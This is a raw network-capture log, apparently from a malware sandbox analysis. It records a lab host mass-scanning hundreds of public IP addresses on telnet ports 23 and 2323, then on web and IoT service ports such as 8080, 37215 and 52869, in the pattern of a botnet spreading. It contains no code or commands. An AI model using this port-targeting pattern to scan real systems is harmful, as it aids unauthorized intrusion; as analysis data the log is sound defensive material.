                                                                        Dec 6, 2024 00:37:04.976351023 CET2341973150.228.54.223192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976361990 CET232341973110.187.234.174192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976381063 CET4197323192.168.2.23150.70.64.121
                                                                        Dec 6, 2024 00:37:04.976382971 CET234197357.13.115.37192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976392984 CET23419734.247.148.245192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976394892 CET419732323192.168.2.23110.187.234.174
                                                                        Dec 6, 2024 00:37:04.976394892 CET4197323192.168.2.23150.228.54.223
                                                                        Dec 6, 2024 00:37:04.976401091 CET232341973220.216.248.17192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976412058 CET234197387.177.220.109192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976421118 CET4197323192.168.2.234.247.148.245
                                                                        Dec 6, 2024 00:37:04.976428986 CET4197323192.168.2.2357.13.115.37
                                                                        Dec 6, 2024 00:37:04.976438999 CET4197323192.168.2.2387.177.220.109
                                                                        Dec 6, 2024 00:37:04.976445913 CET419732323192.168.2.23220.216.248.17
                                                                        Dec 6, 2024 00:37:04.976466894 CET2341973195.189.218.99192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976485014 CET2341973152.52.198.245192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976494074 CET2341973104.165.71.143192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976505041 CET4197323192.168.2.23195.189.218.99
                                                                        Dec 6, 2024 00:37:04.976514101 CET234197368.128.19.87192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976514101 CET4197323192.168.2.23152.52.198.245
                                                                        Dec 6, 2024 00:37:04.976524115 CET2341973206.177.107.249192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976535082 CET4197323192.168.2.23104.165.71.143
                                                                        Dec 6, 2024 00:37:04.976547003 CET234197393.175.188.23192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976556063 CET4197323192.168.2.2368.128.19.87
                                                                        Dec 6, 2024 00:37:04.976558924 CET234197334.180.100.231192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976569891 CET2341973164.43.61.81192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976572990 CET4197323192.168.2.23206.177.107.249
                                                                        Dec 6, 2024 00:37:04.976583004 CET23234197334.171.35.5192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976593018 CET2341973207.174.71.83192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976594925 CET4197323192.168.2.2393.175.188.23
                                                                        Dec 6, 2024 00:37:04.976597071 CET4197323192.168.2.2334.180.100.231
                                                                        Dec 6, 2024 00:37:04.976609945 CET234197371.102.4.40192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976609945 CET4197323192.168.2.23164.43.61.81
                                                                        Dec 6, 2024 00:37:04.976615906 CET419732323192.168.2.2334.171.35.5
                                                                        Dec 6, 2024 00:37:04.976619959 CET2341973122.79.189.210192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976629972 CET4197323192.168.2.23207.174.71.83
                                                                        Dec 6, 2024 00:37:04.976634026 CET234197392.238.36.128192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976644039 CET234197362.104.245.189192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976644993 CET4197323192.168.2.23122.79.189.210
                                                                        Dec 6, 2024 00:37:04.976646900 CET234197369.13.152.223192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976648092 CET4197323192.168.2.2371.102.4.40
                                                                        Dec 6, 2024 00:37:04.976651907 CET2341973218.218.65.249192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976674080 CET4197323192.168.2.2362.104.245.189
                                                                        Dec 6, 2024 00:37:04.976675987 CET4197323192.168.2.2392.238.36.128
                                                                        Dec 6, 2024 00:37:04.976675987 CET4197323192.168.2.23218.218.65.249
                                                                        Dec 6, 2024 00:37:04.976677895 CET4197323192.168.2.2369.13.152.223
                                                                        Dec 6, 2024 00:37:04.976768017 CET2341973170.49.219.34192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976778030 CET2341973182.153.119.10192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976788998 CET232341973169.214.107.191192.168.2.23
                                                                        Dec 6, 2024 00:37:04.976808071 CET4197323192.168.2.23170.49.219.34
                                                                        Dec 6, 2024 00:37:04.976824045 CET4197323192.168.2.23182.153.119.10
                                                                        Dec 6, 2024 00:37:04.976825953 CET419732323192.168.2.23169.214.107.191
                                                                        Dec 6, 2024 00:37:04.977154016 CET2341973175.134.40.155192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977197886 CET4197323192.168.2.23175.134.40.155
                                                                        Dec 6, 2024 00:37:04.977235079 CET234197345.127.174.209192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977245092 CET234197368.2.16.202192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977252960 CET2341973198.85.219.140192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977261066 CET2341973173.221.164.60192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977292061 CET4197323192.168.2.23198.85.219.140
                                                                        Dec 6, 2024 00:37:04.977293968 CET4197323192.168.2.2345.127.174.209
                                                                        Dec 6, 2024 00:37:04.977303982 CET4197323192.168.2.2368.2.16.202
                                                                        Dec 6, 2024 00:37:04.977310896 CET4197323192.168.2.23173.221.164.60
                                                                        Dec 6, 2024 00:37:04.977394104 CET234197397.232.167.172192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977404118 CET2341973124.231.147.233192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977411985 CET2341973104.113.19.19192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977427959 CET23234197396.210.178.155192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977435112 CET4197323192.168.2.2397.232.167.172
                                                                        Dec 6, 2024 00:37:04.977436066 CET234197343.3.141.202192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977446079 CET4197323192.168.2.23104.113.19.19
                                                                        Dec 6, 2024 00:37:04.977452993 CET419732323192.168.2.2396.210.178.155
                                                                        Dec 6, 2024 00:37:04.977452993 CET2341973190.57.120.50192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977456093 CET4197323192.168.2.23124.231.147.233
                                                                        Dec 6, 2024 00:37:04.977463961 CET4197323192.168.2.2343.3.141.202
                                                                        Dec 6, 2024 00:37:04.977464914 CET234197331.134.24.38192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977473974 CET2341973192.103.245.43192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977483034 CET234197385.160.184.129192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977489948 CET234197369.186.5.65192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977499008 CET234197385.227.210.49192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977502108 CET4197323192.168.2.23190.57.120.50
                                                                        Dec 6, 2024 00:37:04.977509975 CET4197323192.168.2.23192.103.245.43
                                                                        Dec 6, 2024 00:37:04.977514029 CET2341973111.239.94.90192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977514982 CET4197323192.168.2.2369.186.5.65
                                                                        Dec 6, 2024 00:37:04.977519035 CET4197323192.168.2.2331.134.24.38
                                                                        Dec 6, 2024 00:37:04.977519035 CET4197323192.168.2.2385.160.184.129
                                                                        Dec 6, 2024 00:37:04.977524042 CET2341973178.183.43.235192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977534056 CET2341973183.251.94.120192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977539062 CET4197323192.168.2.2385.227.210.49
                                                                        Dec 6, 2024 00:37:04.977543116 CET232341973193.41.224.172192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977555037 CET4197323192.168.2.23111.239.94.90
                                                                        Dec 6, 2024 00:37:04.977569103 CET4197323192.168.2.23178.183.43.235
                                                                        Dec 6, 2024 00:37:04.977586031 CET4197323192.168.2.23183.251.94.120
                                                                        Dec 6, 2024 00:37:04.977591038 CET234197392.190.189.169192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977600098 CET23419731.153.243.64192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977601051 CET419732323192.168.2.23193.41.224.172
                                                                        Dec 6, 2024 00:37:04.977618933 CET2341973187.157.225.109192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977627993 CET23419734.66.13.179192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977637053 CET2341973113.207.105.68192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977638960 CET4197323192.168.2.2392.190.189.169
                                                                        Dec 6, 2024 00:37:04.977641106 CET4197323192.168.2.231.153.243.64
                                                                        Dec 6, 2024 00:37:04.977646112 CET2341973126.1.5.178192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977654934 CET234197364.235.97.131192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977663994 CET234197381.102.172.87192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977668047 CET4197323192.168.2.23187.157.225.109
                                                                        Dec 6, 2024 00:37:04.977669954 CET4197323192.168.2.23113.207.105.68
                                                                        Dec 6, 2024 00:37:04.977680922 CET4197323192.168.2.234.66.13.179
                                                                        Dec 6, 2024 00:37:04.977695942 CET4197323192.168.2.23126.1.5.178
                                                                        Dec 6, 2024 00:37:04.977705956 CET4197323192.168.2.2364.235.97.131
                                                                        Dec 6, 2024 00:37:04.977722883 CET4197323192.168.2.2381.102.172.87
                                                                        Dec 6, 2024 00:37:04.977946043 CET2341973175.185.153.117192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977955103 CET23234197378.240.206.71192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977962971 CET2341973114.143.46.133192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977977991 CET234197358.137.131.106192.168.2.23
                                                                        Dec 6, 2024 00:37:04.977993965 CET2341973181.207.179.96192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978003025 CET4197323192.168.2.23114.143.46.133
                                                                        Dec 6, 2024 00:37:04.978008032 CET2341973110.212.37.182192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978018045 CET4197323192.168.2.23175.185.153.117
                                                                        Dec 6, 2024 00:37:04.978018045 CET2341973102.211.67.223192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978029966 CET419732323192.168.2.2378.240.206.71
                                                                        Dec 6, 2024 00:37:04.978048086 CET4197323192.168.2.2358.137.131.106
                                                                        Dec 6, 2024 00:37:04.978049040 CET4197323192.168.2.23102.211.67.223
                                                                        Dec 6, 2024 00:37:04.978069067 CET4197323192.168.2.23181.207.179.96
                                                                        Dec 6, 2024 00:37:04.978087902 CET4197323192.168.2.23110.212.37.182
                                                                        Dec 6, 2024 00:37:04.978089094 CET234197339.122.59.125192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978097916 CET234197391.196.32.137192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978111029 CET2341973187.131.175.149192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978126049 CET2341973192.156.142.183192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978135109 CET234197369.232.115.74192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978140116 CET4197323192.168.2.2339.122.59.125
                                                                        Dec 6, 2024 00:37:04.978146076 CET23234197336.67.202.143192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978151083 CET4197323192.168.2.2391.196.32.137
                                                                        Dec 6, 2024 00:37:04.978164911 CET4197323192.168.2.23187.131.175.149
                                                                        Dec 6, 2024 00:37:04.978168011 CET4197323192.168.2.23192.156.142.183
                                                                        Dec 6, 2024 00:37:04.978168011 CET2341973155.136.29.96192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978179932 CET2341973166.165.111.198192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978188038 CET234197374.63.197.0192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978190899 CET4197323192.168.2.2369.232.115.74
                                                                        Dec 6, 2024 00:37:04.978194952 CET2341973192.127.59.176192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978204012 CET2341973213.156.205.148192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978204012 CET419732323192.168.2.2336.67.202.143
                                                                        Dec 6, 2024 00:37:04.978209019 CET4197323192.168.2.23155.136.29.96
                                                                        Dec 6, 2024 00:37:04.978212118 CET2341973145.207.88.15192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978212118 CET4197323192.168.2.2374.63.197.0
                                                                        Dec 6, 2024 00:37:04.978220940 CET4197323192.168.2.23166.165.111.198
                                                                        Dec 6, 2024 00:37:04.978220940 CET4197323192.168.2.23192.127.59.176
                                                                        Dec 6, 2024 00:37:04.978228092 CET4197323192.168.2.23213.156.205.148
                                                                        Dec 6, 2024 00:37:04.978228092 CET234197367.160.133.69192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978250980 CET4197323192.168.2.23145.207.88.15
                                                                        Dec 6, 2024 00:37:04.978271008 CET4197323192.168.2.2367.160.133.69
                                                                        Dec 6, 2024 00:37:04.978275061 CET232341973177.238.154.83192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978285074 CET234197387.90.144.226192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978291988 CET234197371.46.228.136192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978300095 CET2341973113.197.24.193192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978307962 CET2341973209.247.120.69192.168.2.23
                                                                        Dec 6, 2024 00:37:04.978321075 CET419732323192.168.2.23177.238.154.83
                                                                        Dec 6, 2024 00:37:04.978322983 CET4197323192.168.2.2371.46.228.136
                                                                        Dec 6, 2024 00:37:04.978338003 CET4197323192.168.2.2387.90.144.226
                                                                        Dec 6, 2024 00:37:04.978349924 CET4197323192.168.2.23113.197.24.193
                                                                        Dec 6, 2024 00:37:04.978352070 CET4197323192.168.2.23209.247.120.69
                                                                        Dec 6, 2024 00:37:04.980457067 CET234197341.10.110.103192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980504036 CET4197323192.168.2.2341.10.110.103
                                                                        Dec 6, 2024 00:37:04.980571032 CET234197365.157.80.149192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980587959 CET234197353.51.24.164192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980600119 CET2341973112.96.33.3192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980608940 CET234197370.21.5.87192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980617046 CET232341973210.223.138.31192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980618000 CET4197323192.168.2.2353.51.24.164
                                                                        Dec 6, 2024 00:37:04.980618000 CET4197323192.168.2.2365.157.80.149
                                                                        Dec 6, 2024 00:37:04.980628967 CET4197323192.168.2.23112.96.33.3
                                                                        Dec 6, 2024 00:37:04.980638027 CET2341973190.174.134.77192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980648041 CET234197319.96.173.199192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980653048 CET4197323192.168.2.2370.21.5.87
                                                                        Dec 6, 2024 00:37:04.980655909 CET2341973207.11.235.243192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980664015 CET419732323192.168.2.23210.223.138.31
                                                                        Dec 6, 2024 00:37:04.980678082 CET4197323192.168.2.23190.174.134.77
                                                                        Dec 6, 2024 00:37:04.980680943 CET4197323192.168.2.23207.11.235.243
                                                                        Dec 6, 2024 00:37:04.980700016 CET4197323192.168.2.2319.96.173.199
                                                                        Dec 6, 2024 00:37:04.980731010 CET102341973163.30.109.135192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980740070 CET2341973200.91.213.214192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980747938 CET2341973153.69.130.112192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980756998 CET2341973108.184.199.126192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980766058 CET2341973195.155.173.186192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980772972 CET419731023192.168.2.23163.30.109.135
                                                                        Dec 6, 2024 00:37:04.980779886 CET2341973207.211.102.185192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980779886 CET4197323192.168.2.23153.69.130.112
                                                                        Dec 6, 2024 00:37:04.980781078 CET4197323192.168.2.23200.91.213.214
                                                                        Dec 6, 2024 00:37:04.980787039 CET4197323192.168.2.23108.184.199.126
                                                                        Dec 6, 2024 00:37:04.980788946 CET232341973121.141.227.129192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980796099 CET4197323192.168.2.23195.155.173.186
                                                                        Dec 6, 2024 00:37:04.980811119 CET234197398.3.229.48192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980819941 CET23419731.78.79.5192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980823040 CET4197323192.168.2.23207.211.102.185
                                                                        Dec 6, 2024 00:37:04.980823994 CET419732323192.168.2.23121.141.227.129
                                                                        Dec 6, 2024 00:37:04.980823994 CET2341973161.136.50.3192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980834007 CET234197382.135.72.155192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980842113 CET2341973200.82.194.231192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980859041 CET4197323192.168.2.231.78.79.5
                                                                        Dec 6, 2024 00:37:04.980859041 CET4197323192.168.2.23161.136.50.3
                                                                        Dec 6, 2024 00:37:04.980864048 CET4197323192.168.2.2398.3.229.48
                                                                        Dec 6, 2024 00:37:04.980868101 CET4197323192.168.2.23200.82.194.231
                                                                        Dec 6, 2024 00:37:04.980886936 CET4197323192.168.2.2382.135.72.155
                                                                        Dec 6, 2024 00:37:04.980931997 CET2341973118.191.187.19192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980940104 CET2341973111.237.154.110192.168.2.23
                                                                        Dec 6, 2024 00:37:04.980974913 CET4197323192.168.2.23111.237.154.110
                                                                        Dec 6, 2024 00:37:04.980977058 CET4197323192.168.2.23118.191.187.19
                                                                        Dec 6, 2024 00:37:04.981180906 CET234197371.177.192.187192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981221914 CET4197323192.168.2.2371.177.192.187
                                                                        Dec 6, 2024 00:37:04.981231928 CET234197387.107.90.88192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981240988 CET23234197357.76.219.101192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981249094 CET2341973117.154.50.217192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981270075 CET2341973187.63.27.193192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981275082 CET419732323192.168.2.2357.76.219.101
                                                                        Dec 6, 2024 00:37:04.981282949 CET234197357.91.12.202192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981282949 CET4197323192.168.2.2387.107.90.88
                                                                        Dec 6, 2024 00:37:04.981295109 CET2341973193.241.52.110192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981300116 CET4197323192.168.2.23117.154.50.217
                                                                        Dec 6, 2024 00:37:04.981303930 CET2341973101.230.238.59192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981313944 CET4197323192.168.2.23187.63.27.193
                                                                        Dec 6, 2024 00:37:04.981323004 CET4197323192.168.2.2357.91.12.202
                                                                        Dec 6, 2024 00:37:04.981324911 CET2341973126.120.54.170192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981337070 CET2341973125.24.247.199192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981348038 CET4197323192.168.2.23101.230.238.59
                                                                        Dec 6, 2024 00:37:04.981348991 CET4197323192.168.2.23193.241.52.110
                                                                        Dec 6, 2024 00:37:04.981359959 CET4197323192.168.2.23126.120.54.170
                                                                        Dec 6, 2024 00:37:04.981364012 CET4197323192.168.2.23125.24.247.199
                                                                        Dec 6, 2024 00:37:04.981421947 CET2341973150.58.12.85192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981431961 CET2341973102.96.226.72192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981440067 CET232341973165.196.17.129192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981448889 CET234197336.91.131.6192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981456995 CET2341973187.92.96.4192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981458902 CET4197323192.168.2.23150.58.12.85
                                                                        Dec 6, 2024 00:37:04.981466055 CET234197376.18.128.138192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981477976 CET234197383.51.163.91192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981482983 CET4197323192.168.2.2336.91.131.6
                                                                        Dec 6, 2024 00:37:04.981486082 CET234197374.84.133.240192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981506109 CET4197323192.168.2.23102.96.226.72
                                                                        Dec 6, 2024 00:37:04.981508970 CET4197323192.168.2.2383.51.163.91
                                                                        Dec 6, 2024 00:37:04.981518984 CET419732323192.168.2.23165.196.17.129
                                                                        Dec 6, 2024 00:37:04.981529951 CET4197323192.168.2.2374.84.133.240
                                                                        Dec 6, 2024 00:37:04.981532097 CET234197386.118.52.56192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981542110 CET234197373.111.230.42192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981544018 CET4197323192.168.2.23187.92.96.4
                                                                        Dec 6, 2024 00:37:04.981550932 CET2341973158.143.20.101192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981559992 CET234197383.154.95.81192.168.2.23
                                                                        Dec 6, 2024 00:37:04.981560946 CET4197323192.168.2.2376.18.128.138
                                                                        Dec 6, 2024 00:37:04.981574059 CET4197323192.168.2.2386.118.52.56
                                                                        Dec 6, 2024 00:37:04.981586933 CET4197323192.168.2.2373.111.230.42
                                                                        Dec 6, 2024 00:37:04.981601000 CET4197323192.168.2.23158.143.20.101
                                                                        Dec 6, 2024 00:37:04.981616020 CET4197323192.168.2.2383.154.95.81
                                                                        Dec 6, 2024 00:37:05.847533941 CET5687480192.168.2.23118.175.124.25
                                                                        Dec 6, 2024 00:37:05.847908020 CET597168080192.168.2.2339.116.5.135
                                                                        Dec 6, 2024 00:37:05.848290920 CET3878880192.168.2.23169.40.164.181
                                                                        Dec 6, 2024 00:37:05.848655939 CET5309680192.168.2.2343.79.133.11
                                                                        Dec 6, 2024 00:37:05.849030972 CET340307574192.168.2.2386.51.139.199
                                                                        Dec 6, 2024 00:37:05.849400997 CET3682449152192.168.2.23117.116.60.186
                                                                        Dec 6, 2024 00:37:05.849772930 CET3469481192.168.2.2378.28.5.0
                                                                        Dec 6, 2024 00:37:05.850147009 CET4179080192.168.2.23169.253.87.242
                                                                        Dec 6, 2024 00:37:05.850518942 CET542468443192.168.2.2315.46.198.67
                                                                        Dec 6, 2024 00:37:05.850892067 CET531108443192.168.2.2395.133.117.213
                                                                        Dec 6, 2024 00:37:05.851259947 CET5081480192.168.2.2320.138.27.159
                                                                        Dec 6, 2024 00:37:05.851627111 CET6036049152192.168.2.23144.192.196.181
                                                                        Dec 6, 2024 00:37:05.851994991 CET6046281192.168.2.233.143.102.188
                                                                        Dec 6, 2024 00:37:05.852368116 CET5194680192.168.2.23160.64.200.250
                                                                        Dec 6, 2024 00:37:05.852735043 CET5082680192.168.2.2379.205.134.177
                                                                        Dec 6, 2024 00:37:05.853115082 CET515868443192.168.2.236.134.94.243
                                                                        Dec 6, 2024 00:37:05.853486061 CET4847280192.168.2.231.85.100.98
                                                                        Dec 6, 2024 00:37:05.853868008 CET3728637215192.168.2.23201.239.180.49
                                                                        Dec 6, 2024 00:37:05.854247093 CET4944237215192.168.2.23129.224.247.20
                                                                        Dec 6, 2024 00:37:05.854612112 CET5315837215192.168.2.23143.151.72.28
                                                                        Dec 6, 2024 00:37:05.854983091 CET4727852869192.168.2.2398.35.241.78
                                                                        Dec 6, 2024 00:37:05.855353117 CET3937080192.168.2.2380.180.109.86
                                                                        Dec 6, 2024 00:37:05.855732918 CET5059881192.168.2.2365.224.103.49
                                                                        Dec 6, 2024 00:37:05.856098890 CET5526680192.168.2.23144.94.116.224
                                                                        Dec 6, 2024 00:37:05.856478930 CET5254249152192.168.2.23146.136.103.163
                                                                        Dec 6, 2024 00:37:05.856848955 CET5587281192.168.2.2329.21.212.1
                                                                        Dec 6, 2024 00:37:05.857232094 CET467368080192.168.2.23104.212.159.134
                                                                        Dec 6, 2024 00:37:05.857594013 CET536088443192.168.2.23194.167.150.102
                                                                        Dec 6, 2024 00:37:05.857975006 CET379045555192.168.2.23164.194.135.238
                                                                        Dec 6, 2024 00:37:05.858338118 CET3675080192.168.2.23214.127.3.37
                                                                        Dec 6, 2024 00:37:05.858725071 CET395468080192.168.2.2324.51.61.43
                                                                        Dec 6, 2024 00:37:05.859093904 CET4285849152192.168.2.23110.77.244.54
                                                                        Dec 6, 2024 00:37:05.859469891 CET531148443192.168.2.2371.82.199.131
                                                                        Dec 6, 2024 00:37:05.859847069 CET4733849152192.168.2.23156.177.99.179
                                                                        Dec 6, 2024 00:37:05.860219002 CET445168080192.168.2.23129.222.135.49
                                                                        Dec 6, 2024 00:37:05.860590935 CET4520449152192.168.2.2363.218.221.150
                                                                        Dec 6, 2024 00:37:05.860972881 CET477928080192.168.2.23152.156.223.170
                                                                        Dec 6, 2024 00:37:05.861341953 CET4933281192.168.2.2328.64.132.145
                                                                        Dec 6, 2024 00:37:05.861721992 CET542148080192.168.2.23174.112.238.150
                                                                        Dec 6, 2024 00:37:05.862087011 CET3813880192.168.2.2348.209.236.164
                                                                        Dec 6, 2024 00:37:05.862459898 CET3748081192.168.2.23122.219.76.172
                                                                        Dec 6, 2024 00:37:05.862787962 CET503727574192.168.2.23100.40.238.158
                                                                        Dec 6, 2024 00:37:05.863164902 CET4671080192.168.2.2323.157.2.214
                                                                        Dec 6, 2024 00:37:05.863527060 CET3542280192.168.2.23142.225.53.129
                                                                        Dec 6, 2024 00:37:05.863894939 CET5884280192.168.2.2373.149.43.253
                                                                        Dec 6, 2024 00:37:05.864278078 CET452528080192.168.2.2343.10.138.186
                                                                        Dec 6, 2024 00:37:05.864645958 CET5728880192.168.2.2375.246.37.123
                                                                        Dec 6, 2024 00:37:05.865020990 CET3374080192.168.2.23195.102.149.63
                                                                        Dec 6, 2024 00:37:05.865403891 CET3738852869192.168.2.23121.208.165.185
                                                                        Dec 6, 2024 00:37:05.865771055 CET3723680192.168.2.23159.226.179.189
                                                                        Dec 6, 2024 00:37:05.866151094 CET357965555192.168.2.2384.207.247.119
                                                                        Dec 6, 2024 00:37:05.866519928 CET434488443192.168.2.23172.152.38.25
                                                                        Dec 6, 2024 00:37:05.866900921 CET5238280192.168.2.23187.208.34.38
                                                                        Dec 6, 2024 00:37:05.867269993 CET4937449152192.168.2.23204.19.175.144
                                                                        Dec 6, 2024 00:37:05.867649078 CET499628443192.168.2.23125.95.228.225
                                                                        Dec 6, 2024 00:37:05.868015051 CET415188080192.168.2.23162.10.150.72
                                                                        Dec 6, 2024 00:37:05.868387938 CET3643481192.168.2.2347.244.58.30
                                                                        Dec 6, 2024 00:37:05.868751049 CET542048080192.168.2.23161.159.158.251
                                                                        Dec 6, 2024 00:37:05.869129896 CET5389852869192.168.2.23140.49.192.11
                                                                        Dec 6, 2024 00:37:05.869137049 CET421848080192.168.2.2324.111.109.113
                                                                        Dec 6, 2024 00:37:05.869503975 CET402928443192.168.2.23174.161.22.78
                                                                        Dec 6, 2024 00:37:05.869888067 CET4625280192.168.2.231.98.140.42
                                                                        Dec 6, 2024 00:37:05.870253086 CET568968080192.168.2.23145.217.58.149
                                                                        Dec 6, 2024 00:37:05.870635986 CET5951849152192.168.2.23199.176.49.4
                                                                        Dec 6, 2024 00:37:05.871001959 CET544948080192.168.2.2379.72.226.128
                                                                        Dec 6, 2024 00:37:05.871022940 CET511565555192.168.2.2384.240.86.160
                                                                        Dec 6, 2024 00:37:05.871400118 CET493525555192.168.2.23189.47.162.68
                                                                        Dec 6, 2024 00:37:05.871776104 CET3981052869192.168.2.23157.80.252.25
                                                                        Dec 6, 2024 00:37:05.872145891 CET328748443192.168.2.23120.168.131.75
                                                                        Dec 6, 2024 00:37:05.872525930 CET447248443192.168.2.23175.63.134.34
                                                                        Dec 6, 2024 00:37:05.872896910 CET5651280192.168.2.2356.75.49.173
                                                                        Dec 6, 2024 00:37:05.873209000 CET419731023192.168.2.2320.112.52.98
                                                                        Dec 6, 2024 00:37:05.873213053 CET4197323192.168.2.23197.33.150.19
                                                                        Dec 6, 2024 00:37:05.873239040 CET4197323192.168.2.23115.200.221.145
                                                                        Dec 6, 2024 00:37:05.873241901 CET4197323192.168.2.2319.46.182.86
                                                                        Dec 6, 2024 00:37:05.873241901 CET4197323192.168.2.23177.5.100.38
                                                                        Dec 6, 2024 00:37:05.873249054 CET4197323192.168.2.23163.180.14.39
                                                                        Dec 6, 2024 00:37:05.873251915 CET4197323192.168.2.23123.104.147.147
                                                                        Dec 6, 2024 00:37:05.873260021 CET4197323192.168.2.23206.196.33.131
                                                                        Dec 6, 2024 00:37:05.873266935 CET419732323192.168.2.2345.102.119.100
                                                                        Dec 6, 2024 00:37:05.873266935 CET4197323192.168.2.2335.96.186.32
                                                                        Dec 6, 2024 00:37:05.873270035 CET5681680192.168.2.2385.36.32.17
                                                                        Dec 6, 2024 00:37:05.873274088 CET4197323192.168.2.23104.114.158.30
                                                                        Dec 6, 2024 00:37:05.873286009 CET4197323192.168.2.2346.180.24.53
                                                                        Dec 6, 2024 00:37:05.873286963 CET4197323192.168.2.23200.40.196.214
                                                                        Dec 6, 2024 00:37:05.873296022 CET4197323192.168.2.23106.129.225.240
                                                                        Dec 6, 2024 00:37:05.873301983 CET4197323192.168.2.23207.116.184.53
